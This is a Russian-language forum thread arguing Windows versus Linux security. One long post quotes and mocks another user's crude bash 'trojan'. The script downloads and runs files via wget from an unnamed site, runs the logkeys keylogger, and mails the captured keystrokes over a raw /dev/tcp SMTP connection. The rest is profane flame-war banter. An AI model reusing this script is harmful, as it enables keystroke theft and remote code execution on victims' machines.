Обнаружен первый в истории троянец для Linux.

Tritus · 13-10-12 16:09:43

Rector пишет:

Или сраной ФС, которая не рационально использует дисковое пространство и в итоге добавляет тормозов к системе. Спинным и толстым мозгом, под названием "реестр"? В нём очень удобно работать, да. Там всё интуитивно понятно. Настройками, размазанными по системе, и очень запутанными. Когда некий параметр, может настраиваться из 1500 мест. Вы считаете это нормальным? Да ради бога! Кушайте паренный кактус, иголки мяхкие и солёные, как раз под пиво -)

Сейчас зарыдаю smile ... Реестр не предназначен для того, чтобы юзер в нём ковырялся. И настройки хранятся в основном в реестре, а не размазаны по системе. Ну некоторые разработчики, конечно, пишут софт с конфигами а-ля Linux-way, но это уже частный случай. Параметры очень неплохо настраиваются и с помощью GUI из панели управления, которая специально сделана для того, чтобы как можно меньше ковыряться в реестре. А в Windows 7 мне даже и настраивать ничего особо не пришлось - всё и так работает как нужно.

ikkunan salvataja · 13-10-12 16:13:02

Okkamas Buddy пишет:

А писать под линукс, видимо, не очень просто,

Вообще то попроще, если речь идёт о том, чтобы написать какую специфичную програмку, которая нужна только тебе, и больше ничего от компьютера не нужно, и готового решения нету, то линукс будет предпочтительнее виндов.

Tritus · 13-10-12 16:13:40

Rector пишет:

То есть, 1 % виндузни осознанно к этому подходит. А остальные, как сидят под админами, так и сидят.

Для тех, кто подходит неосознанно, из коробки есть фаерволл и в 8-ке будет антивирь. Ну еще и UAC. Даже этого вполне достаточно для десктопа.

Rector · 13-10-12 16:13:41

Okkamas Buddy пишет:

эксплоер, начиная с 7-ки мне не кажется уёбищным, хотя я пользуюсь честно купленным тотал-коммандером.

То есть, очередным костылём. Я правильно понял? А что же не родным файловым менегером? Уёбищный да? -)) Дельфин его раздавит не заметив -))

Tritus · 13-10-12 16:19:44

Вот из свеженького:

Подскажите ещё пожалуйста, как узнать или проверить какой процес или вообще что может жрать трафик как исходящий так и входящий, за 1 минуту после включения сервера проходит порятка 3 гб исходящего трафика, и где то 1.5 гб входящего.
Походу в машине что то завелось. как это выяснить и убить?

Хороший вопрос... Действительно, как?

Rector · 13-10-12 16:20:40

Tritus пишет:

Сейчас зарыдаю ...

Да, плачь пока тихо, роняя скупую мужскую слезу. Как крокодил, ты будешь плакать, когда соберешься поднять что-то посерьёзней домашней машины.

Tritus пишет:

Для тех, кто подходит неосознанно, из коробки есть фаерволл и в 8-ке будет антивирь

Шапочки из фольги и синей изоленты нет в комплекте?

Tritus · 13-10-12 16:24:27

Rector пишет:

Да, плачь пока тихо, роняя скупую мужскую слезу. Как крокодил, ты будешь плакать, когда соберешься поднять что-то посерьёзней домашней машины.

Да подавляющему большинству пользователей ничего больше домашней машины и не нужно.

Rector пишет:

Шапочки из фольги и синей изоленты нет в комплекте?

Это к дистрам Linux прикладывать нужно - другой защиты-то нет...

Rector · 13-10-12 16:31:00

Tritus пишет:

Вот из свеженького:
Подскажите ещё пожалуйста, как узнать или проверить какой процес или вообще что может жрать трафик как исходящий так и входящий, за 1 минуту после включения сервера проходит порятка 3 гб исходящего трафика, и где то 1.5 гб входящего.
Походу в машине что то завелось. как это выяснить и убить?
Хороший вопрос... Действительно, как?

Это пишет "админ" некоего "сервера"? А же говорил, что виндовые Одмины - через одного, редкостные долбоёбы. Даже советовать ничего не буду. Пусть идёт у палатки бутылки собирает.

Tritus пишет:

Да подавляющему большинству пользователей ничего больше домашней машины и не нужно.

Угу...Только скажи ка мне, какого х*я они тут экспертами выступают по системе которую они не знают. А!?

Okkamas Buddy · 13-10-12 16:31:44

Rector пишет:

То есть, очередным костылём. Я правильно понял? А что же не родным файловым менегером? Уёбищный да? -)) Дельфин его раздавит не заметив -))

Жене хватает эксплоера, я тоже им пользуюсь, если надо просто открыть папку с видео и запустить фильм или скинуть пару файлов на флешку, он не уёбищен, а тотал - не костыль. Он просто удобен лично мне, когда нужно отсортировать файлы по множеству фильтров, сделать жёсткие ссылки в два клика, массово переименовать кучу файлов и тд. А дельфин меня бесил, что каждый раз спрашивал что делать с файлом (копировать/переместить), и ничего с этим было не сделать (2010-й год, как щас не знаю), хотя я всегда привык внутри диска перемещать, на флешку или съёмный диск - копировать.

ikkunan salvataja · 13-10-12 16:32:08

Tritus пишет:

Действительно, как?

lsof -i

Tritus · 13-10-12 16:34:07

Rector пишет:

Это пишет "админ" некоего "сервера"? А же говорил, что виндовые Одмины - через одного, редкостные долбоёбы. Даже советовать ничего не буду. Пусть идёт у палатки бутылки собирает.

Это с Убунтуфорума. Сервер, естественно, на Убунте.

ikkunan salvataja · 13-10-12 16:39:08

Tritus пишет:

Сервер, естественно, на Убунте.

Админ, естественно, вчерашний виндеец.

Rector · 13-10-12 16:40:09

Tritus пишет:

Это с Убунтуфорума. Сервер, естественно, на Убунте

Не читайте убунтофорум советских газет.
+++
Виндузне, прежде чем работать в Linux, нужно перестроить мышление. Но это могут совсем не многие. Ибо, винда здорово извилины разглаживает -))

Tritus · 13-10-12 16:44:14

ikkunan salvataja пишет:

Админ, естественно, вчерашний виндеец.

А как же мегабезопасный Linux? Что-то же завелось на сервере.

Rector · 13-10-12 16:51:21

Tritus пишет:

А как же мегабезопасный Linux? Что-то же завелось на сервере.

А Linux вероятно, как винда, должен просто встать и работать, да? Короче, пока не сменишь мышление - не лезь к Linux'у вообще! Это понятно?

Apollo 11 · 13-10-12 19:24:13

selenscy, вот это баттхёрт! lol

selenscy пишет:

изначально было сказано, что этот скрипт сделан на коленке

Да, и я это подтвердил. Почему ж тебя это так припекло? lol

selenscy пишет:

с целью показать, что поделие дыряво как дуршлаг

...а в итоге показал свою криворукость и п*здливость.

selenscy пишет:

Очень меня посмешили идиотские вопросы

А что тебе ещё остаётся, кроме как по-идиотски смеяться? Вопросы мои, друХ ты мой, были абсолютно по-существу. И ответов ты на них так и не дал. Ты не ответил, почему твои "взломанные машины" все сплошь виртуалки в руках вендузятнегов; ты не ответил, как ты собираешься перехватывать адреса электронной почты, если "клиент" не вводит их руками (человек пользуется закладками; он заходит на yandex.ru и даже если у него нет автологина и автозаполнения, он введёт ручками логин: vasja и пароль: 123456; как ты узнаешь, от какого ресурса эти логин и пароль? Не проще ли было бы для таких дел фейковую страницу yandex'а сделать и воровать печеньки?) Почему у тебя в логах пользователи вбивают адреса от почты руками? почему ты не осилил прочитать man к кейлоггеру? Ведь при запуске кейлоггера с теми опциями, что ты лепишь, он выдаёт кашу неразборчивых символов, в то время как у меня он заработал после прочтения man'а? Как ты решаешь проблему перезагрузки, ведь у тебя в скрипте этого нет? Твой примитив настолько по-идиотски сделан, что по определению не в состоянии работать.

selenscy пишет:

а уж функционала можно навесить выше крыши, в зависимости от фантазии

Ну, вот когда навесишь, тогда и хвастаться будешь о том, как ты "поимел все линупсы на планете". А пока что низачёт.

selenscy пишет:

давно так не ржал

Это единственное, что у тебя получается без глюков и косяков.

selenscy пишет:

Ну а теперь сам скрипт

О_о! Ты, я вижу, таки его допилил? Значит, мои вопросы, всё-таки, возымели действие, да? Мне ты выложил вот эту хню:

#!/bin/bash

logk=`ps -A|grep logk|wc -l`
if [[ "$logk" -ge "1" ]] ; then
    /папка где шкеримся/logk -k
fi
wget -q -t 1 -N -nd https://некий сайтец/conf -P /папка где шкеримся/
wget -q -t 1 -N -nd https://некий сайтец/spam -P /папка где шкеримся/
wget -q -t 1 -N -nd https://некий сайтец/engine -P /папка где шкеримся/
wget -q -t 1 -N -nd https://некий сайтец/sys -P /папка где шкеримся/
/папка где шкеримся/./sys
/папка где шкеримся/./mailsend2
size=`du -b /usr/lib/engine/keys | awk '{print $1}'`
if [[ "$size" -ge "8192" ]] ; then
    rm -f /папка где шкеримся/keys
    /папка где шкеримся/logk -s -o /папка где шкеримся/keys --no-func-keys
    echo $file1
    exit 0
fi
/папка где шкеримся/logk -s -o /папка где шкеримся/keys --no-func-keys
#!/bin/bash

  e_from=`cat /папка где шкеримся/conf | awk '{if (NR==1) {print $1}}'`
  e_to=`cat /папка где шкеримся/conf | awk '{if (NR==2) {print $1}}'`
  header=`cat /папка где шкеримся/conf | awk '{if (NR==3) {print $1}}'`
  body=`cat /папка где шкеримся/conf | awk '{if (NR==4) {print $1}}'`
  e_server=`cat /папка где шкеримся/conf | awk '{if (NR==5) {print $1}}'`
  e_login=`cat /папка где шкеримся/conf | awk '{if (NR==6) {print $1}}'`
  e_pass=`cat /папка где шкеримся/conf | awk '{if (NR==7) {print $1}}'`
  subject=`cat /папка где шкеримся/conf | awk '{if (NR==8) {print $1}}'`
  e_port=`cat /папка где шкеримся/conf | awk '{if (NR==9) {print $1}}'`

exec 9<>/dev/tcp/$e_server/$e_port
echo "HELO me" >&9
read -r temp <&9
  echo "auth login" >&9
read -r temp <&9
echo $e_login >&9
read -r temp <&9
  echo $e_pass >&9
read -r temp <&9
echo "Mail From: $e_from" >&9
read -r temp <&9
echo "Rcpt To: $e_to" >&9
read -r temp <&9
echo "Data" >&9
read -r temp <&9
  cat $header >&9
echo "Subject: "$subject >&9
echo "From: "$e_from >&9
echo "To: "$e_to >&9
echo >&9
cat $body >&9
echo "." >&9
read -r temp <&9
echo "quit" >&9
read -r temp <&9
9>&-
9<&-
exit 0

Теперь, я вижу, ты и права на исполнения даёшь. Хотя кейлоггер так и запускается с нерабочими опциями.

selenscy пишет:

Из логики работы mailsender видно, как он перебирает строки и вынимает из conf адреса, логины, пароли, порты и прочее для своей работы. У Мудака-списиалиста с большой быквы здесь случился когнитивный диссонанс, после чего он обосрался знатно. Заметьте, что conf полностью не использован и парли шифрованы, отчего и почему думаю разберётесь, это не сложно, кодовое слово base64

Пилять, ещё раз: отправка мейла мне не интересна, это совершенно тривиальная вещь! Откуда в логе кейлоггера возьмутся адреса электронной почты? Чаще всего заходишь на сайт (по закладке), у тебя уже даже логин введён, остаётся только ввести пароль. Откуда ты знаешь, что selenscy_clown — это пароль от моего почтового ящика? Как ты его выделишь среди других набранных мной символов? Далее: горе-линуксоиды, качающие софт со всяких помоек, и к консоли относятся как к чему-то страшному и ужасному. Если среди них и найдётся парочка идиотов, сумевших ввести в консоли sudo su, чтобы ты увидел это в логах, то какова вероятность, что они скачают твою поделку? Те же, что консолью не пользуются, будут запускать программу и, если ей понадобятся привилегии, то отработает gksu и его аналоги. Где у тебя перехват этого события? Нету? У тебя юзвери вбивают в консоль sudo su, а в браузер yandex.ru? Да ещё и вендузятнеги с линупсом в виртуалке? И ты хочешь, чтобы тебе поверили? Стена ============> там.

selenscy пишет:

logk это просто переименованый logkeys wink От которого у Мудака-списиалиста случился второй когнитивный диссонанс и срыв шаблона

А ты предлагаешь самому додумываться, что за процесс ты ищешь, а потом пытаешься запустить программу с тем же именем? Я посмотрел у себя в процессах, естественно, ничего подобного не нашёл. Поискал в репозиториях, тоже нет программы с таким именем. Спрашиваю: что за процесс ищется и какая программа запускается? На что опять получил ведро помоев в лицо и обвинения в некомпетентности. Наконец, добился ответа: это, типа, кейлоггер. Ну, ok, кейлоггер, значит, кейлоггер. Самописный или какой? Если самописный можно ли увидеть код? В ответ: "да ты бля списиалист и бла-бла-бла!!111 это logkeys!!111". Наконец, после этого стало ясно, что это за опция -k к logkeys'у и почему ты сначала ищешь, а потом "запускаешь" опять. Написал бы "killall logkeys", вопросов бы не возникало. Спрашиваю: это в бубунте он так называется? — нет, он вкладывается в .deb-пакет. Ну, наконец-то, хоть что-то вытянули пассатижами! И так по каждому пункту: получаешь ведро помоев, призываешь не кипятиться, получаешь кусочек информации, опять задаёшь вопрос, наконец оно разрождается-таки ещё кусочком информации. И это всё после полуночи, когда параллельно выполняешь срочную работу. В итоге ты, друХ мой, так мне настох*ел своими в*ебонами, что я решил на тебя просто забить и больше не мучиться вопросами. Поскольку у меня возникло устойчивое впечатление, что ты сам не понимаешь, что написано в "твоём" же скрипте и ты вынужден постоянно бегать к кому-то за консультацией. И, судя по тому, что ты продолжаешь дописывать свою поделку, мои вопросы таки возымели действие.

selenscy пишет:

Повторяю, что это logkeys лежит в лепрозориях и сделан совсем не selenscy по жопе эль и антилопе гну

Повторять-то ты это повторяешь. Теперь. Но сколько времени и терпения понадобилось, чтобы из тебя вытянуть эту информацию? А уж заставить тебя прочитать man к logkeys'у, чтобы он у тебя нормально заработал, так и не получилось.

selenscy пишет:

Троян ведь уже запущен

После перезагрузки? Как он у тебя запускается после перезагрузки? Или опять начнёшь вопить о "тупом Apollo 11"? Впрочем, этому я уже и не удивляюсь.
P.S. Ты даже не понимаешь, насколько ты глупо выглядишь со своей поделкой, получив root'а и не сумев даже организовать ни автозапуск после перезагрузки, ни перехват событий, ни чего бы то ни было ещё. Одно слово: клоун.

Добавлено спустя 18 мин 10 с:

selenscy пишет:

size=`du -b /место где храним скрипт/keys | awk '{print $1}'`

Ну, вот-вот, вижу, что и свой косяк с size=`du -b /usr/lib/engine/keys | awk '{print $1}'` ты здесь подправил. И опять скажешь, что мой вопрос: "что это за каталог такой? и где в скрипте он создаётся" был глупым? Ты что мне ответил, чЮдик? Что этот каталог создаётся из .deb-пакета. Хотя сам .deb-пакет ты так и не выложил, но вопросы считаешь идиотскими? Знаешь, я всегда знал, что ты бестолочь, поэтому и сейчас не удивляюсь, но имей совесть, не пытайся выкрутиться сейчас.

NEMO · 13-10-12 20:02:34

ikkunan salvataja пишет:

Это если через драйвер прямого доступа к портам? Ну-ну, завизжит оно, также как и про бут-сектор.

Наверное, этот драйвер надо установить, так? Это тоже вызовет срабатывание HIPS, если только путь драйвера к ядру лежит не через астрал.

Rector пишет:

То есть, система настолько слаба, что ей приходиться использовать специальные средства, для выявления такой активности. С обязательным сообщением пользователю, на его решение.
---
Как-то в Линуксе, такой хуйнёй вообще не страдают. Я не слышал о подобной активности линуксовых троянов -)

Конечно, система слаба без человека. Но очень глупо говорить, что деревня туземцев сможет остановить армаду современных танков только от того, что они их никогда не видели и не воевали с ними. Не надо ставить Линукс в ту позицию, в которой он не был. Люди, столкнувшиеся с мировыми войнами ничем не хуже и не слабее тех, кто пересидел все эти события в джунглях с голыми жопами и копьями в руках.

Белая рысь · 13-10-12 20:08:21

pavel2403 пишет:

причем здесь линух?

Ни при чём, ежу же ясно. Как и всегда. И антивирус в нём не нужен, и бутсектор сам защищается, и работают в нём исключительно профессионалы, ставящие софт исключительно высокого качества исключительно из репозиториев. Вроде, я ничего не забыл.
А, не, забыл. Конечно же, это всё происходит на всём спектре оборудования, начиная от штопора и заканчивая МКС. При чём, со стандартным ядром.

ikkunan salvataja · 13-10-12 20:39:32

pavel2403 пишет:

Для таких задач обычно и программируемого калькулятора хватает, причем здесь линух?

Пашик, не пори чушь, ей больно. Задачи могут быть совершенно разные, например мониторинг уровня сигналов на линиях ввода/вывода некоего девайса, причём не серийного. Подозреваю что он вообще в единичном экземпляре был. Калькулятор там точно не справился бы. И такие задачи встречаются значительно чаще чем ты думаешь, правда как правило это различные тренажёры или симуляторы, а не системы мониторинга.

NEMO пишет:

Это тоже вызовет срабатывание HIPS,

Ну посмотри, сработает ли на
/forum/img/external/rghost.ru/40913847 или /forum/img/external/rghost.ru/40913865

NEMO · 13-10-12 20:52:15

ikkunan salvataja пишет:

Ну посмотри, сработает ли на
/forum/img/external/rghost.ru/40913847 или /forum/img/external/rghost.ru/40913865

Это только драйвера. Я сказал, что срабатывание вызовет их установка.

ikkunan salvataja · 13-10-12 21:05:00

NEMO пишет:

Я сказал, что срабатывание вызовет их установка.

А если ты сам дал команду на установку? У нас же великий гуру selenscy что звездит? Линух дыряв, поскольку если захочешь там можно шпионскую программу запустить, а винда не дырява, там если такого рода программу начнёшь устанавливать — сработает антивирус. Так вот, сработает ли антивирус на эти файлы? Именно антивирус, а не запрос разрешить ли программе внести изменения.

Okkamas Buddy · 13-10-12 21:10:34

ikkunan salvataja пишет:

Пашик, не пори чушь, ей больно. Задачи могут быть совершенно разные, например мониторинг уровня сигналов на линиях ввода/вывода некоего девайса, причём не серийного. Подозреваю что он вообще в единичном экземпляре был. Калькулятор там точно не справился бы. И такие задачи встречаются значительно чаще чем ты думаешь, правда как правило это различные тренажёры или симуляторы, а не системы мониторинга.

Не знаю кто как, я лично тут тока про десктопный линукс негодую. smile
К суперкомпьютерам, серверам, банкоматам, роутерам и всяким, там, датчикам лично у меня претензий никаких нет.

NEMO · 13-10-12 21:15:38

ikkunan salvataja пишет:

А если ты сам дал команду на установку? У нас же великий гуру selenscy что звездит? Линух дыряв, поскольку если захочешь там можно шпионскую программу запустить, а винда не дырява, там если такого рода программу начнёшь устанавливать — сработает антивирус. Так вот, сработает ли антивирус на эти файлы? Именно антивирус, а не запрос разрешить ли программе внести изменения.

В текущем виде эти драйверы вряд ли установить. Нет inf файлов. Если же установку будет делать программа, то поднимется тревога. Антивирус скорее всего ничего не скажет на эти файлы, если будут просто где-то лежать, так как они первично созданы и используются не в злых намерениях. Но в большинстве хороших антивирусов есть HIPS, что приводит нас к началу круга.

Редактировался NEMO (13-10-12 21:16:38)

ikkunan salvataja · 13-10-12 21:27:28

NEMO пишет:

Если же установку будет делать программа, то поднимется тревога.

Ну не тревога, а вопрос позволить ли программе внести изменения, об этом я уже писал. Мне пожалуйста именно реакцию антивируса, что там эвристический анализ скажет?

NEMO пишет:

В текущем виде эти драйверы вряд ли установить. Нет inf файлов.

Кстати необязательно и inf файл, можно и reg и зарегистрировать его в реестре.

Форум StopLinux

Объявление

#1001 13-10-12 16:09:43

Re: Обнаружен первый в истории троянец для Linux.

#1002 13-10-12 16:13:02

Re: Обнаружен первый в истории троянец для Linux.

#1003 13-10-12 16:13:40

Re: Обнаружен первый в истории троянец для Linux.

#1004 13-10-12 16:13:41

Re: Обнаружен первый в истории троянец для Linux.

#1005 13-10-12 16:19:44

Re: Обнаружен первый в истории троянец для Linux.

#1006 13-10-12 16:20:40

Re: Обнаружен первый в истории троянец для Linux.

#1007 13-10-12 16:24:27

Re: Обнаружен первый в истории троянец для Linux.

#1008 13-10-12 16:31:00

Re: Обнаружен первый в истории троянец для Linux.

#1009 13-10-12 16:31:44

Re: Обнаружен первый в истории троянец для Linux.

#1010 13-10-12 16:32:08

Re: Обнаружен первый в истории троянец для Linux.

#1011 13-10-12 16:34:07

Re: Обнаружен первый в истории троянец для Linux.

#1012 13-10-12 16:39:08

Re: Обнаружен первый в истории троянец для Linux.

#1013 13-10-12 16:40:09

Re: Обнаружен первый в истории троянец для Linux.

#1014 13-10-12 16:44:14

Re: Обнаружен первый в истории троянец для Linux.

#1015 13-10-12 16:51:21

Re: Обнаружен первый в истории троянец для Linux.

#1016 13-10-12 19:24:13

Re: Обнаружен первый в истории троянец для Linux.

#1017 13-10-12 20:02:34

Re: Обнаружен первый в истории троянец для Linux.

#1018 13-10-12 20:08:21

Re: Обнаружен первый в истории троянец для Linux.

#1019 13-10-12 20:39:32

Re: Обнаружен первый в истории троянец для Linux.

#1020 13-10-12 20:52:15

Re: Обнаружен первый в истории троянец для Linux.

#1021 13-10-12 21:05:00

Re: Обнаружен первый в истории троянец для Linux.

#1022 13-10-12 21:10:34

Re: Обнаружен первый в истории троянец для Linux.

#1023 13-10-12 21:15:38

Re: Обнаружен первый в истории троянец для Linux.

#1024 13-10-12 21:27:28

Re: Обнаружен первый в истории троянец для Linux.

Подвал форума